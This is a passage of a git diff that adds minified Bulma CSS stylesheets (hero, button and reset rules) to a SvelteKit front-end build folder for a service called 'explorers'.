a{color:#3e8ed0!important;opacity:1}.hero.is-info .tabs.is-boxed a,.hero.is-info .tabs.is-toggle a{color:#fff}.hero.is-info .tabs.is-boxed a:hover,.hero.is-info .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-info .tabs.is-boxed li.is-active a,.hero.is-info .tabs.is-boxed li.is-active a:hover,.hero.is-info .tabs.is-toggle li.is-active a,.hero.is-info .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3e8ed0}.hero.is-info.is-bold{background-image:linear-gradient(141deg,#208fbc 0%,#3e8ed0 71%,#4d83db 100%)}@media screen and (max-width: 768px){.hero.is-info.is-bold .navbar-menu{background-image:linear-gradient(141deg,#208fbc 0%,#3e8ed0 71%,#4d83db 100%)}}.hero.is-success{background-color:#48c78e;color:#fff}.hero.is-success a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-success strong{color:inherit}.hero.is-success .title{color:#fff}.hero.is-success .subtitle{color:#ffffffe6}.hero.is-success .subtitle a:not(.button),.hero.is-success .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-success .navbar-menu{background-color:#48c78e}}.hero.is-success .navbar-item,.hero.is-success .navbar-link{color:#ffffffb3}.hero.is-success a.navbar-item:hover,.hero.is-success a.navbar-item.is-active,.hero.is-success .navbar-link:hover,.hero.is-success .navbar-link.is-active{background-color:#3abb81;color:#fff}.hero.is-success .tabs a{color:#fff;opacity:.9}.hero.is-success .tabs a:hover{opacity:1}.hero.is-success .tabs li.is-active a{color:#48c78e!important;opacity:1}.hero.is-success .tabs.is-boxed a,.hero.is-success .tabs.is-toggle a{color:#fff}.hero.is-success .tabs.is-boxed a:hover,.hero.is-success .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-success .tabs.is-boxed li.is-active a,.hero.is-success .tabs.is-boxed li.is-active a:hover,.hero.is-success .tabs.is-toggle li.is-active a,.hero.is-success .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#48c78e}.hero.is-success.is-bold{background-image:linear-gradient(141deg,#29b35e 0%,#48c78e 71%,#56d2af 100%)}@media screen and (max-width: 768px){.hero.is-success.is-bold .navbar-menu{background-image:linear-gradient(141deg,#29b35e 0%,#48c78e 71%,#56d2af 100%)}}.hero.is-warning{background-color:#ffe08a;color:#000000b3}.hero.is-warning a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-warning strong{color:inherit}.hero.is-warning .title{color:#000000b3}.hero.is-warning .subtitle{color:#000000e6}.hero.is-warning .subtitle a:not(.button),.hero.is-warning .subtitle strong{color:#000000b3}@media screen and (max-width: 1023px){.hero.is-warning .navbar-menu{background-color:#ffe08a}}.hero.is-warning .navbar-item,.hero.is-warning .navbar-link{color:#000000b3}.hero.is-warning a.navbar-item:hover,.hero.is-warning a.navbar-item.is-active,.hero.is-warning .navbar-link:hover,.hero.is-warning .navbar-link.is-active{background-color:#ffd970;color:#000000b3}.hero.is-warning .tabs a{color:#000000b3;opacity:.9}.hero.is-warning .tabs a:hover{opacity:1}.hero.is-warning .tabs li.is-active a{color:#ffe08a!important;opacity:1}.hero.is-warning .tabs.is-boxed a,.hero.is-warning .tabs.is-toggle a{color:#000000b3}.hero.is-warning .tabs.is-boxed a:hover,.hero.is-warning .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-warning .tabs.is-boxed li.is-active a,.hero.is-warning .tabs.is-boxed li.is-active a:hover,.hero.is-warning .tabs.is-toggle li.is-active a,.hero.is-warning .tabs.is-toggle li.is-active a:hover{background-color:#000000b3;border-color:#000000b3;color:#ffe08a}.hero.is-warning.is-bold{background-image:linear-gradient(141deg,#ffb657 0%,#ffe08a 71%,#fff6a3 100%)}@media screen and (max-width: 768px){.hero.is-warning.is-bold .navbar-menu{background-image:linear-gradient(141deg,#ffb657 0%,#ffe08a 71%,#fff6a3 100%)}}.hero.is-danger{background-color:#f14668;color:#fff}.hero.is-danger a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-danger strong{color:inherit}.hero.is-danger .title{color:#fff}.hero.is-danger .subtitle{color:#ffffffe6}.hero.is-danger .subtitle a:not(.button),.hero.is-danger .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-danger .navbar-menu{background-color:#f14668}}.hero.is-danger .navbar-item,.hero.is-danger .navbar-link{color:#ffffffb3}.hero.is-danger a.navbar-item:hover,.hero.is-danger a.navbar-item.is-active,.hero.is-danger .navbar-link:hover,.hero.is-danger .navbar-link.is-active{background-color:#ef2e55;color:#fff}.hero.is-danger .tabs a{color:#fff;opacity:.9}.hero.is-danger .tabs a:hover{opacity:1}.hero.is-danger .tabs li.is-active a{color:#f14668!important;opacity:1}.hero.is-danger .tabs.is-boxed a,.hero.is-danger .tabs.is-toggle a{color:#fff}.hero.is-danger .tabs.is-boxed a:hover,.hero.is-danger .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-danger .tabs.is-boxed li.is-active a,.hero.is-danger .tabs.is-boxed li.is-active a:hover,.hero.is-danger .tabs.is-toggle li.is-active a,.hero.is-danger .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#f14668}.hero.is-danger.is-bold{background-image:linear-gradient(141deg,#fa0a62 0%,#f14668 71%,#f7595f 100%)}@media screen and (max-width: 768px){.hero.is-danger.is-bold .navbar-menu{background-image:linear-gradient(141deg,#fa0a62 0%,#f14668 71%,#f7595f 100%)}}.hero.is-small .hero-body{padding:1.5rem}@media screen and (min-width: 769px),print{.hero.is-medium .hero-body{padding:9rem 4.5rem}}@media screen and (min-width: 769px),print{.hero.is-large .hero-body{padding:18rem 6rem}}.hero.is-halfheight .hero-body,.hero.is-fullheight .hero-body,.hero.is-fullheight-with-navbar .hero-body{align-items:center;display:flex}.hero.is-halfheight .hero-body>.container,.hero.is-fullheight .hero-body>.container,.hero.is-fullheight-with-navbar .hero-body>.container{flex-grow:1;flex-shrink:1}.hero.is-halfheight{min-height:50vh}.hero.is-fullheight{min-height:100vh}.hero-video{overflow:hidden}.hero-video video{left:50%;min-height:100%;min-width:100%;position:absolute;top:50%;transform:translate3d(-50%,-50%,0)}.hero-video.is-transparent{opacity:.3}@media screen and (max-width: 768px){.hero-video{display:none}}.hero-buttons{margin-top:1.5rem}@media screen and (max-width: 768px){.hero-buttons .button{display:flex}.hero-buttons .button:not(:last-child){margin-bottom:.75rem}}@media screen and (min-width: 769px),print{.hero-buttons{display:flex;justify-content:center}.hero-buttons .button:not(:last-child){margin-right:1.5rem}}.hero-head,.hero-foot{flex-grow:0;flex-shrink:0}.hero-body{flex-grow:1;flex-shrink:0;padding:3rem 1.5rem}@media screen and (min-width: 769px),print{.hero-body{padding:3rem}}.section{padding:3rem 1.5rem}@media screen and (min-width: 1024px){.section{padding:3rem}.section.is-medium{padding:9rem 4.5rem}.section.is-large{padding:18rem 6rem}}.footer{background-color:#fafafa;padding:3rem 1.5rem 6rem}
diff --git a/services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css b/services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css
new file mode 100644
index 0000000..16eef92
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css
@@ -0,0 +1 @@
+/*! bulma.io v0.9.4 | MIT License | github.com/jgthms/bulma */.button,.input,.textarea,.select select,.file-cta,.file-name,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:focus,.input:focus,.textarea:focus,.select select:focus,.file-cta:focus,.file-name:focus,.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus,.pagination-ellipsis:focus,.is-focused.button,.is-focused.input,.is-focused.textarea,.select select.is-focused,.is-focused.file-cta,.is-focused.file-name,.is-focused.pagination-previous,.is-focused.pagination-next,.is-focused.pagination-link,.is-focused.pagination-ellipsis,.button:active,.input:active,.textarea:active,.select select:active,.file-cta:active,.file-name:active,.pagination-previous:active,.pagination-next:active,.pagination-link:active,.pagination-ellipsis:active,.is-active.button,.is-active.input,.is-active.textarea,.select select.is-active,.is-active.file-cta,.is-active.file-name,.is-active.pagination-previous,.is-active.pagination-next,.is-active.pagination-link,.is-active.pagination-ellipsis{outline:none}.button[disabled],.input[disabled],.textarea[disabled],.select select[disabled],.file-cta[disabled],.file-name[disabled],.pagination-previous[disabled],.pagination-next[disabled],.pagination-link[disabled],.pagination-ellipsis[disabled],fieldset[disabled] .button,fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .pagination-previous,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-ellipsis{cursor:not-allowed}.button,.file,.breadcrumb,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis,.tabs,.is-unselectable{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.select:not(.is-multiple):not(.is-loading):after,.navbar-link:not(.is-arrowless):after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.box:not(:last-child),.content:not(:last-child),.notification:not(:last-child),.progress:not(:last-child),.table:not(:last-child),.table-container:not(:last-child),.title:not(:last-child),.subtitle:not(:last-child),.block:not(:last-child),.breadcrumb:not(:last-child),.level:not(:last-child),.message:not(:last-child),.pagination:not(:last-child),.tabs:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-moz-appearance:none;-webkit-appearance:none;background-color:#0a0a0a33;border:none;border-radius:9999px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:none;position:relative;vertical-align:top;width:20px}.delete:before,.modal-close:before,.delete:after,.modal-close:after{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.delete:before,.modal-close:before{height:2px;width:50%}.delete:after,.modal-close:after{height:50%;width:2px}.delete:hover,.modal-close:hover,.delete:focus,.modal-close:focus{background-color:#0a0a0a4d}.delete:active,.modal-close:active{background-color:#0a0a0a66}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading:after,.loader,.select.is-loading:after,.control.is-loading:after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:9999px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio,.modal,.modal-background,.is-overlay,.hero-video{inset:0;position:absolute}.navbar-burger{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0}/*! minireset.css v0.0.6 | MIT License | github.com/jgthms/minireset.css */html,body,p,ol,ul,li,dl,dt,dd,blockquote,figure,fieldset,legend,textarea,pre,iframe,hr,h1,h2,h3,h4,h5,h6{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:inherit}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,optgroup,select,textarea{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#485fc7;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#da1039;font-size:.875em;font-weight:400;padding:.25em .5em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:inherit}table th{color:#363636}@-webkit-keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;display:block;padding:1.25rem}a.box:hover,a.box:focus{box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #485fc7}a.box:active{box-shadow:inset 0 1px 2px #0a0a0a33,0 0 0 1px #485fc7}.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-small,.button .icon.is-medium,.button .icon.is-large{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button .icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button:hover,.button.is-hovered{border-color:#b5b5b5;color:#363636}.button:focus,.button.is-focused{border-color:#485fc7;color:#363636}.button:focus:not(:active),.button.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button:active,.button.is-active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text:hover,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text.is-focused{background-color:#f5f5f5;color:#363636}.button.is-text:active,.button.is-text.is-active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}.button.is-ghost{background:none;border-color:transparent;color:#485fc7;text-decoration:none}.button.is-ghost:hover,.button.is-ghost.is-hovered{color:#485fc7;text-decoration:underline}.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white:hover,.button.is-white.is-hovered{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white:focus,.button.is-white.is-focused{border-color:transparent;color:#0a0a0a}.button.is-white:focus:not(:active),.button.is-white.is-focused:not(:active){box-shadow:0 0 0 .125em #ffffff40}.button.is-white:active,.button.is-white.is-active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:#fff;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted:hover,.button.is-white.is-inverted.is-hovered{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined:hover,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined.is-focused{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading:after{border-color:transparent transparent white white!important}.button.is-white.is-outlined.is-loading:hover:after,.button.is-white.is-outlined.is-loading.is-hovered:after,.button.is-white.is-outlined.is-loading:focus:after,.button.is-white.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] .button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined:hover,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined.is-focused{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading:hover:after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-white.is-inverted.is-outlined.is-loading:focus:after,.button.is-white.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black:hover,.button.is-black.is-hovered{background-color:#040404;border-color:transparent;color:#fff}.button.is-black:focus,.button.is-black.is-focused{border-color:transparent;color:#fff}.button.is-black:focus:not(:active),.button.is-black.is-focused:not(:active){box-shadow:0 0 0 .125em #0a0a0a40}.button.is-black:active,.button.is-black.is-active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:#0a0a0a;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted:hover,.button.is-black.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined:hover,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined.is-focused{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading:hover:after,.button.is-black.is-outlined.is-loading.is-hovered:after,.button.is-black.is-outlined.is-loading:focus:after,.button.is-black.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined[disabled],fieldset[disabled] .button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined:hover,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined.is-focused{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading:hover:after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-black.is-inverted.is-outlined.is-loading:focus:after,.button.is-black.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.button.is-light:hover,.button.is-light.is-hovered{background-color:#eee;border-color:transparent;color:#000000b3}.button.is-light:focus,.button.is-light.is-focused{border-color:transparent;color:#000000b3}.button.is-light:focus:not(:active),.button.is-light.is-focused:not(:active){box-shadow:0 0 0 .125em #f5f5f540}.button.is-light:active,.button.is-light.is-active{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.button.is-light[disabled],fieldset[disabled] .button.is-light{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none}.button.is-light.is-inverted{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted:hover,.button.is-light.is-inverted.is-hovered{background-color:#000000b3}.button.is-light.is-inverted[disabled],fieldset[disabled] .button.is-light.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined:hover,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined.is-focused{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.button.is-light.is-outlined.is-loading:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-outlined.is-loading:hover:after,.button.is-light.is-outlined.is-loading.is-hovered:after,.button.is-light.is-outlined.is-loading:focus:after,.button.is-light.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-light.is-inverted.is-outlined:hover,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading:hover:after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-light.is-inverted.is-outlined.is-loading:focus:after,.button.is-light.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark:hover,.button.is-dark.is-hovered{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark:focus,.button.is-dark.is-focused{border-color:transparent;color:#fff}.button.is-dark:focus:not(:active),.button.is-dark.is-focused:not(:active){box-shadow:0 0 0 .125em #36363640}.button.is-dark:active,.button.is-dark.is-active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:#363636;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted:hover,.button.is-dark.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined:hover,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined.is-focused{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading:hover:after,.button.is-dark.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-outlined.is-loading:focus:after,.button.is-dark.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined:hover,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined.is-focused{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading:hover:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-inverted.is-outlined.is-loading:focus:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary:hover,.button.is-primary.is-hovered{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary:focus,.button.is-primary.is-focused{border-color:transparent;color:#fff}.button.is-primary:focus:not(:active),.button.is-primary.is-focused:not(:active){box-shadow:0 0 0 .125em #00d1b240}.button.is-primary:active,.button.is-primary.is-active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:#00d1b2;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted:hover,.button.is-primary.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] .button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined:hover,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined.is-focused{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading:hover:after,.button.is-primary.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-outlined.is-loading:focus:after,.button.is-primary.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined:hover,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined.is-focused{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading:hover:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-inverted.is-outlined.is-loading:focus:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light:hover,.button.is-primary.is-light.is-hovered{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light:active,.button.is-primary.is-light.is-active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#485fc7;border-color:transparent;color:#fff}.button.is-link:hover,.button.is-link.is-hovered{background-color:#3e56c4;border-color:transparent;color:#fff}.button.is-link:focus,.button.is-link.is-focused{border-color:transparent;color:#fff}.button.is-link:focus:not(:active),.button.is-link.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button.is-link:active,.button.is-link.is-active{background-color:#3a51bb;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#485fc7;border-color:#485fc7;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#485fc7}.button.is-link.is-inverted:hover,.button.is-link.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] 